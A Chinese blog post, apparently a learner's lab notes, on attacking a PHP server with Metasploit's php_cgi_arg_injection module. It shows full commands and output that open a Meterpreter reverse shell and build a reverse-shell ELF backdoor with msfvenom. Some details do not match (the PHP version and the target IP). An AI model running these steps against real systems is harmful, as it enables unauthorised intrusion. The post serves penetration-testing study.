前言
针对PHP5.2.4进行渗透测试提权
一、启动metasploit数据库
启动metasploit在上一篇文章已经详细介绍
利用db_nmap扫描到的结果,在进行services -u 过滤结果
msf6 > services -u
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.115 80 tcp http open Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
192.168.1.115 81 tcp http open Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
msf6 >
二、PHP5.2.4渗透测试
1.设置相关渗透模块
use exploit/multi/http/php_cgi_arg_injection
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PLESK false yes Exploit Plesk
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.105 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:
<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI no The URI to request (must be a CGI-handled PHP script)
URIENCODING 0 yes Level of URI URIENCODING and padding (0 for minimum)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/php_cgi_arg_injection) > setg lport 4567
lport => 4567
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4567
[*] Sending stage (39282 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.113:4567 -> 192.168.1.105:43816) at 2021-05-06 21:44:40 +0800
meterpreter > lls
2.提权
因为现在是php meterpreter 权限,有些操作不能完成
meterpreter > arp
[-] The "arp" command is not supported by this Meterpreter type (php/php)
生成攻击载荷
┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lprotE=4568 -f elf >php_backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
┌──(root💀kali)-[~]
└─# mv php_backdoor.elf ../var/www/html
但在被控端的meterpreter权限中,无法使用wget等命令,所以没有完成提权,如果你成功了,希望你可以分享于本文不同的做法
meterpreter > pwd
[-] The "pwd" command is not supported by this Meterpreter type (php/php)
meterpreter >
总结
本文简单介绍了php 5.2.4后门漏洞的渗透攻击以及提权,本人也在学习当中,仅供参考,作为学习笔记使用,欢迎一起讨论。